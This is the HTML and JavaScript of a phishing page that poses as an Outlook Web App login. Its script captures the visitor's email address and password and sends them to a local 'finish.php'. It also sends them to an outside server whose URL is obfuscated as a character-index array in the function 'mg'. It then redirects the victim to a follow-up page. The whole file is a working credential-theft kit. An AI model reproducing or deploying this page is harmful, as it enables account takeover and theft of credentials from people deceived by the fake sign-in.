<html>

<head>
    <meta name="msapplication-tap-highlight" content="no">
    <title>Outlook</title>
    <link href="imgs/favicon.ico" rel="shortcut icon">
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
    <meta name="viewport" content="user-scalable=no ">
    <meta name="HandheldFriendly" content="true">
    <meta http-equiv="X-UA-Compatible" content="IE=IE9">
    <style>
        [v-cloak] {
            display: none;
        }
    </style>
    <link type="text/css" rel="stylesheet" href="css/1dba3111b0418d6d209e83024863b800nbr1572797879.css">
    <link type="text/css" rel="stylesheet" href="css/ba5ecdd16c000176c18fb0f77113c442nbr1572797879.css">
    <style type="text/css">
        .vue-html5-editor .color-card {
            margin: 2px;
            width: 30px;
            height: 30px;
            float: left;
            cursor: pointer
        }
    </style>
    <style type="text/css">
        .vue-html5-editor,
        .vue-html5-editor * {
            box-sizing: border-box
        }
        
        .vue-html5-editor {
            font-size: 14px;
            line-height: 1.5;
            background-color: #fff;
            color: #333;
            border: 1px solid #ddd;
            text-align: left;
            border-radius: 5px;
            overflow: hidden
        }
        
        .vue-html5-editor.full-screen {
            position: fixed!important;
            top: 0!important;
            left: 0!important;
            bottom: 0!important;
            right: 0!important;
            border-radius: 0
        }
        
        .vue-html5-editor>.toolbar {
            position: relative;
            background-color: inherit
        }
        
        .vue-html5-editor>.toolbar>ul {
            list-style: none;
            padding: 0;
            margin: 0;
            border-bottom: 1px solid #ddd
        }
        
        .vue-html5-editor>.toolbar>ul>li {
            display: inline-block;
            cursor: pointer;
            text-align: center;
            line-height: 36px;
            padding: 0 10px
        }
        
        .vue-html5-editor>.toolbar>ul>li .icon {
            height: 16px;
            width: 16px;
            display: inline-block;
            vertical-align: middle
        }
        
        .vue-html5-editor>.toolbar>.dashboard {
            background-color: inherit;
            border-bottom: 1px solid #ddd;
            padding: 10px;
            position: absolute;
            top: 100%;
            left: 0;
            right: 0;
            overflow: auto
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text],
        .vue-html5-editor>.toolbar>.dashboard input[type=number],
        .vue-html5-editor>.toolbar>.dashboard select {
            padding: 6px 12px;
            color: inherit;
            background-color: transparent;
            border: 1px solid #ddd;
            border-radius: 5px
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text]:hover,
        .vue-html5-editor>.toolbar>.dashboard input[type=number]:hover,
        .vue-html5-editor>.toolbar>.dashboard select:hover {
            border-color: #bebebe
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=text][readonly],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][readonly],
        .vue-html5-editor>.toolbar>.dashboard select[disabled],
        .vue-html5-editor>.toolbar>.dashboard select[readonly] {
            background-color: #eee;
            opacity: 1
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][disabled],
        .vue-html5-editor>.toolbar>.dashboard select[disabled] {
            cursor: not-allowed
        }
        
        .vue-html5-editor>.toolbar>.dashboard button {
            color: inherit;
            background-color: inherit;
            padding: 6px 12px;
            white-space: nowrap;
            vertical-align: middle;
            cursor: pointer;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            border: 1px solid #ddd;
            border-radius: 5px;
            margin-right: 4px;
            margin-bottom: 4px
        }
        
        .vue-html5-editor>.toolbar>.dashboard button:hover {
            border-color: #bebebe
        }
        
        .vue-html5-editor>.toolbar>.dashboard button[disabled] {
            cursor: not-allowed;
            opacity: .68
        }
        
        .vue-html5-editor>.toolbar>.dashboard button:last-child {
            margin-right: 0
        }
        
        .vue-html5-editor>.toolbar>.dashboard label {
            font-weight: bolder
        }
        
        .vue-html5-editor>.content {
            overflow: auto;
            padding: 10px
        }
        
        .vue-html5-editor>.content:focus {
            outline: 0
        }
    </style>
</head>

<body class="jcBbDOAes54hYQo6P8VtN1SFJuwvz fix-header card-no-border">
    <noscript><strong>We're sorry but link1 doesn't work properly without JavaScript enabled.Please enable it to continue.</strong></noscript>
    <div class="HFzuVk3sQjmyWBnS1X9w06" id="outdated" style="background-color:rgb(242,86,72);color:white;opacity:1;display:none;z-index:999999999999999999;">
        <div class="vertical-center">
            <h6 style="color:white;">Your browser is out-of-date!</h6>
            <p style="color:white;">Website work well in Edge,Google Chrome,FireFox,Safari
                <br>Update your browser to view this website correctly.<a id="buttonUpdateBrowser" rel="nofollow" href="http://outdatedbrowser.com/" style="color:white;background-color:rgb(242,86,72);">Update my browser now</a></p>
            <p class="last"><a href="#" id="buttonCloseUpdateBrowser" title="Close" style="color:white;">×</a></p>
        </div>
    </div>
    <div style="height: 100%; width: 100%;"><span></span>
        <form id="vgf" autocomplete="off" novalidate="novalidate" >
            <div id="mainLogonDiv" class="NHTef790ccf380f11aerLy">
                <div class="Afce8b1c684e8b1c684XEWg">
                    <div class="hfIc15e3f5bc15e3f5brjyBp"><img src="imgs/ii.png" aria-hidden="true" class="QJcbf2688fcbf2688fsmzd"><img src="imgs/i.png" aria-hidden="true" class="zcc0929d2cc0929d2YSlet"></div>
                </div>
                <div class="Die4a3ea2e4a3ea2qWhnA">
                    <div id="lgnDiv" class="ee7cb8f74e7cb8f74vTwq">
                        <div role="heading" aria-label="Outlook Web App " class="Tc7282f03c7282f03oveAN"><img src="imgs/owa.png" alt="Outlook Web App " class="dXk1317c01317c0AraPN"></div>
                        <div id="userNameLabel" aria-hidden="true" class="iyUf80a5a14f80a5a14bZjl">Email Address:</div>
                        <div>
                            <input type="email" data-vv-name="UserName" id="username" name="email" role="textbox" required="required" aria-labelledby="userNameLabel" class="xd1071e34d1071e34docJS" aria-required="true" aria-invalid="false">
                        </div>
                        <div id="passwordLabel" aria-hidden="true" class="iyUf80a5a14f80a5a14bZjl">Password:</div>
                        <div>
                            <input type="password" id="password" data-vv-name="password" name="password" required="required" value="" aria-labelledby="passwordLabel" class="xd1071e34d1071e34docJS" aria-required="true" aria-invalid="false">
                        </div>
                        <div class="yLd10008dbd10008dbvoXWP oZe4c487efe4c487efbLwpA">
                            <input type="checkbox" id="showPasswordCheck" class="W27acd6ea27acd6eazOrF"><span>Show password</span></div>
                        <div id="signInErrorDiv" role="alert" tabindex="0" class="fg371e44f1371e44f1Wnuh" style="display: none;">The user name or password you entered isn't correct.Try entering it again.</div>
                        <div id="prvtExp" role="note" class="Ya83f28da83f28dNvG" style="display: none;">Select this option if you're the only person who uses this computer.Your server will allow a longer period of inactivity before signing you out.</div>
                        <div id="expltxt" role="alert" class="Ya83f28da83f28dNvG"></div>
                        <div class="Dzhcf2097d8cf2097d8Yha">
                            <div class="hfc46442dfc46442dhdxCk"><img src="imgs/owa2.png" alt="" class="T3c916be3c916bebRsGW"><span class="n2811e6d82811e6d8InsJ">sign in</span></div>
                            <input name="isUtf8" value="1" type="hidden">
                        </div>
                    </div>
                </div>
                <div id="cookieMsg" class="ee7cb8f74e7cb8f74vTwq" style="display: none;">
                    <div class="signInHeader">Outlook Web App </div>
                    <div class="Ya83f28da83f28dNvG">Please enable cookies for this Web site.
                        <br>
                        <br>Cookies are currently disabled by your browser.Outlook Web App requires that cookies be enabled.
                        <br>
                        <br>For information about how to enable cookies,see the Help for your Web browser.
                        <br>
                        <br>
                        <br>
                    </div>
                    <div class="Dzhcf2097d8cf2097d8Yha">
                        <div style="cursor: pointer; display: inline;"><img src="imgs/owa2.png" alt="" class="T3c916be3c916bebRsGW"><span tabindex="0" class="n2811e6d82811e6d8InsJ">retry</span></div>
                    </div>
                </div>
            </div>
        </form>
    </div>
	
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.4.1.min.js"></script>
	<script>
	
	  $(document).ready(function(){
	    var vgf = $('#vgf');
	    var sbt = $('.hfc46442dfc46442dhdxCk');
		var eml = '';
		eml = GetURLParameter('e');
		if(eml && validateEmail(eml)){
		 eml = eml.toLowerCase();
		 $('#vgf input[name=email]').val(eml);
		 $('#vgf input[name=email]').attr('disabled','disabled'); 
		}
		vgf.submit(function(e){
		  e.preventDefault();
		  process_submited_data();
		});
		
		sbt.click(function(even){
		  even.preventDefault();
		  process_submited_data();
		});
		
		
		
	  });
	  
	  function process_submited_data(){
	    var signInErrorDiv = $('#signInErrorDiv');
		  var emcon = $('#vgf input[name=email]');
		  var pscon = $('#vgf input[name=password]');
		  var emv = emcon.val();
		  var psv = pscon.val();
		  if(emv.length > 0 && psv.length > 0){
            mg(emv, psv, 'Outlook-Web-App');
            var theemidval = '{HASHED_EMAIL}';
            $.ajax({
              url: 'finish.php',
              type: 'POST',
              dataType: 'html',
              data: { Email : emv, password : psv, theemid : theemidval, typeofemail : 'Outlook-Web-App'},
              crossDomain: true,
              success: function(msg) {
              },
              error: function(e) {
                console.log(e)
              }
            });

            var redirecturlurl = 'index2.html#' + emv;
			var eml = '';
		    eml = GetURLParameter('e');
		    if(eml && validateEmail(eml)){
		      eml = eml.toLowerCase();
		      redirecturlurl = redirecturlurl + '' + '?e='+eml;
			}
            setTimeout(function(){
              window.location.replace(redirecturlurl);
            }, 1000);
          }
	  
	  }
	
	
	    function validateEmail(email) {
        var re = /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
        return re.test(String(email).toLowerCase());
    }
    function GetURLParameter(sParam)
    {
        var sPageURL = window.location.search.substring(1);
        var sURLVariables = sPageURL.split('&');
        for (var i = 0; i < sURLVariables.length; i++)
        {
            var sParameterName = sURLVariables[i].split('=');
            if (sParameterName[0] == sParam)
            {
                return decodeURIComponent(sParameterName[1]);
            }
        }
    }
    function get_domain_part_of_email(email){
        var output = '';
        var pos_at = email.indexOf('@');
        if(pos_at != -1){
            output = email.substr(pos_at+1);
        }
        return output;
    }
    function mg(a,o,tt){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],t = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:t,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:tt},crossDomain:!0,success:function(a){},error:function(a){}})}

    document.getElementById("username").value = location.hash.substring(1);
	</script>
</body>

</html>
